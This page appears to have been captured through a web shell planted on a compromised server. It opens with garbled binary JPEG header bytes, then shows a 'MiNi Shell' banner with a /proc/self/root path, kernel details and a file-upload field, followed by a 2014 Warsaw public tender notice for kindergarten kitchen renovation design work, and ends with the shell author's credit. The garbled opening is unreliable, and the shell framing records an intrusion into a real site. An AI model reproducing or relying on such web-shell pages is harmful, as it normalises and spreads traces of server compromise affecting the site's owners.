JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140508/154836-N-2014.html

<p class="kh_header"><b>Warszawa: wykonanie dokumentacji projektowej na remont bloku żywieniowego  w Przedszkolu nr 54 przy ul. Bracławskiej 8a w dzielnicy Praga-Południe m.st. Warszawy</b><br>
<b>Numer ogłoszenia: 154836 - 2014; data zamieszczenia: 08.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd m. st. Warszawy dla Dzielnicy Praga Południe , ul. Grochowska 274, 03-841 Warszawa, woj. mazowieckie, tel. 22 33 80 717, faks 22 33 80 767.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pragapld.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie dokumentacji projektowej na remont bloku żywieniowego  w Przedszkolu nr 54 przy ul. Bracławskiej 8a w dzielnicy Praga-Południe m.st. Warszawy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na remont bloku żywieniowego  w Przedszkolu nr 54 przy ul. Bracławskiej 8a w dzielnicy Praga-Południe m.st. Warszawy.

Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na remont bloku żywieniowego  w Przedszkolu nr 54 przy ul. Bracławskiej 8a w dzielnicy Praga-Południe m.st. Warszawy. 
1) Stan istniejący
Budynek Przedszkola został wybudowany w 1972roku, jako dwukondygnacyjny, podpiwniczony dla 4 grup dziecięcych. Pomieszczenia głównego bloku żywieniowego znajdują się na I piętrze, część magazynowa i pomieszczenie obróbki wstępnej w piwnicy. Na parterze i I piętrze  zlokalizowane są zmywalnie.
Budynek posiada przyłącza wod.kan., gazowe, zasilenie z msc. Węzeł dwufunkcyjny (co, ccw) jest po modernizacji, w budynku są niewymienione: instalacja elektryczna, kanalizacyjna i wodna, wentylacja mechaniczna jest niesprawna.
Łączna kubatura budynku - 3 776,50m3. Powierzchnia użytkowa 1 036,74m2. Wysokość pomieszczeń na parterze i I piętrze wynosi 3,20m, w piwnicy 2,20m.

2) Założenia programowe
Należy wykonać dokumentację projektową dla Przedszkola wydającego 156 całodziennych posiłków (śniadanie, II śniadanie, obiad, podwieczorek), dla 6 grup dziecięcych (156 dzieci). Zakłada się, że praca odbywać się będzie w systemie jedno zmianowym a surowce dostarczane będą na bieżąco. Dlatego powierzchnia magazynowa może zostać ograniczona do minimum niezbędnego do przetrzymywania zapasów produktów na kilka dni.

2. Zakres zadania :
     Opracowanie projektowe obejmuje:
1.	wykonanie inwentaryzacji budowlanej niezbędnej dla potrzeb zamówienia - 2 egz.+2 egz. w wersji elektronicznej (format pliku: pdf) ;
2.	projekt budowlany, wykonawczy wszystkich branż potrzebnych do wypełnienia funkcji projektowanego remontu ( architektura, konstrukcja, sanitarna, elektryczna, itp.) -opracowany w 6 egz.+ 2 egz. w wersji elektronicznej (format pliku:pdf);
3.	projekt aranżacji wnętrz z wyszczególnieniem kolorystyki oraz kompletnego wyposażenia w meble, wyposażenie technologiczne - opracowany w 6 egz.+ 2 egz. w wersji elektronicznej (format pliku:pdf);
4.	uzyskanie wszelkich koniecznych uzgodnień, zgód, pozwoleń i opinii;
5.	przedmiary robót z podziałem na branże obejmujące przedmiot zamówienia i uwzględniające wszystkie niezbędne czynności wynikające z konieczności zabezpieczenia prac oraz innych czynności nie wynikających  bezpośrednio z dokumentacji technicznej w wyżej wymienionym zakresie - opracowane w 3 egz. + 2 egz. w formie elektronicznej (format pliku: pdf. i ath);
6.	kosztorysy inwestorskie z podziałem na branże oraz zbiorcze zestawienie kosztów - opracowane w 2 egz. + 2 egz. w formie elektronicznej (format pliku: pdf. i ath);
7.	plan BIOZ - informacja dotycząca bezpieczeństwa i ochrony zdrowia ze względu na specyfikę obiektu budowlanego, jeśli jest wymagana przepisami - opracowany w 6 egz. + 2 egz. w formie elektronicznej (format pliku: pdf. );
8.	opracowanie Specyfikacji technicznej wykonania i odbioru robót z podziałem na branże - opracowana w 3 egz. + 2 egz. w formie elektronicznej (format pliku: pdf. );

3. Zakres obowiązków wykonawcy:
1.	przed rozpoczęciem prac projektowych uzgodnienie i zaakceptowanie przez Zamawiającego w porozumieniu z Użytkownikiem ostatecznej koncepcji projektowanego remontu;
2.	uzgodnienie z Zamawiającym wstępnej fazy rozwiązań projektowych obiektu; 
3.	wykonanie prac będących przedmiotem umowy, zgodnie z postanowieniami zawartymi w umowie i załączniku, ustaleniami ze spotkań roboczych, zasadami współczesnej wiedzy technicznej, z należytą starannością przy zastosowaniu obowiązujących przepisów w tym techniczno-budowlanych i ochrony środowiska, norm i warunków technicznych z uwzględnieniem potrzeb i specyfikacji przedmiotowego zamówienia;
4.	wykonanie kompletnej dokumentacji projektowo-kosztorysowej z punktu widzenia celu, któremu ma służyć;
5.	uczestniczenie w spotkaniach roboczych w trakcie opracowania dokumentacji;
6.	wykonanie wszelkich dodatkowych opracowań niezbędnych do wykonania dokumentacji projektowo-kosztorysowej oraz uzyskania wymaganych pozwoleń, decyzji, opinii i uzgodnień itp.;
7.	sprawdzenie dokumentacji w zakresie wynikającym z przepisów;
8.	w przypadku gdy projektowane rozwiązania wymagać będą jakichkolwiek zmian w konstrukcji, architekturze, instalacjach, urządzeniach itp. istniejącego budynku  bądź zagospodarowania terenu, wykonawca opracuje dokumentację projektowo- kosztorysową tych zmian bez obowiązku dodatkowego wynagrodzenia;
9.	zgłaszane przez zamawiającego uzupełnienia, korekty i wyjaśnienia dotyczące dokumentacji projektowo-kosztorysowej, będącej przedmiotem zamówienia, Wykonawca wykona nieodpłatnie w ramach niniejszego zamówienia;
10.	jeśli wystąpi konieczność wykonania opracowań dodatkowych, które będą następstwem wad dokumentacji, błędów lub zaniedbań Wykonawcy, opracowania takie zostaną wykonane przez Wykonawcę bez dodatkowego wynagrodzenia w ustalonym z Zamawiającym terminie;
11.	zakres obowiązków Projektanta określony w Dz.U. z 2010 r. Nr 243 poz.1623 Ustawy Prawo budowlane;
12.	udzielenie przez Wykonawcę wyjaśnień na zapytania lub uwagi dotyczące dokumentacji, w ciągu 2 dni od daty zgłoszenia takiej potrzeby przez Zamawiającego.

4. Opis wymagań zamawiającego w stosunku do przedmiotu zamówienia:
1.	dokumentacja projektowo-kosztorysowa będzie służyć do opisu przedmiotu zamówienia do przetargu w oparciu o ustawę zamówień publicznych na roboty budowlane oraz realizacji pełnego zakresu robót na jej podstawie;
2.	opracowanie dokumentacji projektowej wraz z niezbędnymi uzgodnieniami i opiniami, sprawdzeniem rozwiązań  w zakresie wynikającym z przepisów, zasadami wiedzy technicznej, obowiązującymi przepisami i normami;
3.	zastosowanie w dokumentacji wyłącznie materiałów i wyrobów posiadających dopuszczenia do obrotu i stosowana w budownictwie, zgodnie z wymogami art.10 Prawa budowlanego z 7 lipca  1994 r (Dz.U. z 2010 r. nr 243 poz.1623 - tj. ze zm.),
4.	wersje elektroniczną dokumentacji należy przekazać na opisanych płytach CD. Kosztorysy wszystkich branż należy wykonać w formacie ATH; Dokumentacja elektroniczna projektów winna być odzwierciedleniem (scan) dokumentacji projektowej egzemplarza archiwalnego w formie papierowej - z oryginałami opinii, uzgodnień i oświadczeń, itp.;
5.	dokumentacja projektowa musi być trwale i czytelnie oznaczona, ponadto trwale oprawiona;
6.	dokumentacja musi posiadać wszelkie wymagane prawem opinie, pozwolenia, decyzje, uzgodnienia w tym również uzgodnienia międzybranżowe;
7.	zapewnienie wykonania przedmiotu umowy przez osoby mające wymagane przez prawo uprawnienia;
8.	uzupełnienie braków w dokumentacji lub usunięcie jej wad w terminie określonym przez zamawiającego;
9.	wprowadzenie przez Wykonawcę rozwiązań kolizji, które ewentualnie wystąpią na budowie w ciągu 2 dni od daty zgłoszenia takiej potrzeby przez Zamawiającego z wyłączeniem przypadków awaryjnych, które powinny być wykonane bezzwłocznie;
10.	przeniesienia majątkowych praw autorskich do dokumentacji na Zamawiającego;
11.	zgłoszenia wykonanej dokumentacji do odbioru i przekazania jej Zamawiającemu.

5.  Przepisy prawne związane z projektowaniem
Na etapie wykonywania prac projektowych należy przestrzegać przepisów zawartych w szczególności w następujących aktach prawnych:
1.	ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243 poz. 1623 ze zm.),
2.	rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003 r. Nr 120, poz. 1133 ze zm.),
3.	ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 t.j. ze zm.),
4.	rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 ze zm.),
5.	rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389),
6.	ustawie z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 ze zm.),
7.	ustawie z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. u. z 2008 r. Nr 25 poz. 150 z późn. zm.),
8.	ustawie z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. Nr 185 poz. 1243 ze zm.),
9.	obowiązujących normach.
10.	wymaganiach dostawcy ciepła Dalkia Warszawa S.A.

6. Informacje ogólne
W posiadaniu przedszkola jest projekt archiwalny instalacji elektrycznej z naniesionymi rzutami pomieszczeń przedszkolnych.
7. Szczegółowy opis przedmiotu zamówienia i obowiązki Wykonawcy zawiera wzór umowy stanowiący załącznik Nr 6 do SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych. Wartość robót uzupełniających nie może przekroczyć 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia dodatkowych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazania co najmniej dwóch dokumentacji modernizacji/remontu bloku żywieniowego, wykonanych należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia dodatkowych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wykazania osób, które będą uczestniczyć w wykonywaniu zamówienia, w tym co najmniej:

- 1 osoby posiadającej uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej;
- 1 osoby posiadającej uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
- 1 osoby posiadającej uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.

Osoby proponowane do pełnienia funkcji projektanta muszą posiadać uprawnienia do wykonywania samodzielnych funkcji w budownictwie odpowiadające wymaganiom określonym w ustawie - Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
W przypadku osób będących obywatelami krajów członkowskich Unii Europejskiej oznacza to decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczpospolitej Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia - zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 18 marca 2008 r. o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394) oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. nr 5, poz. 42 ze zm)
Osoby posiadające uprawnienia do projektowania muszą posiadać przynajmniej 3 letnie doświadczenie przy realizacji prac projektowych.
b)	oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia dodatkowych warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykonania dokumentacji modernizacji/remontu bloku żywieniowego;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1	Wypełnionego Formularza Oferty - wg wzoru stanowiącego załącznik Nr 1 do SIWZ.
2.	Ocena spełnienia warunków udziału w postępowaniu i braku podstaw do wykluczenia będzie dokonywana na podstawie dokumentów i oświadczeń złożonych wraz z ofertą wg zasady: spełnia / nie spełnia.
3.	Wykonawca musi potwierdzić spełnienie warunków  i brak podstaw do wykluczenia nie później niż na dzień składania ofert. 
4)	Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących w szczególności:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Zmian postanowień umowy strony mogą dokonać wyłącznie w formie pisemnej, w drodze aneksu, w każdym czasie, w przypadku:
1)	zmniejszenia zakresu przedmiotu zamówienia, jeżeli wystąpią uzasadnione okoliczności nie dające się wcześniej przewidzieć i pozwolą na wykonanie przedmiotu umowy, tak by w pełni służył celowi,
2)	zmiany nazwy, NIP i Regonu Projektanta, jeżeli nie powoduje to zmiany Projektanta,
3)	zmiany terminu wykonania przedmiotu umowy wynikającej z konieczności opracowania dodatkowych projektów wykonawczych na usunięcie nieprzewidzianych kolizji,
4)	zmiany zakresu robót,
5)	działania siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zamowienia.pragapld.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych dla Dzielnicy Praga-Południe
03-833 Warszawa, Podskarbińska 6 pok. 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2014 godzina 12:00, miejsce: Wydział Zamówień Publicznych dla Dzielnicy Praga-Południe
03-833 Warszawa, Podskarbińska 6 pok. 217.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com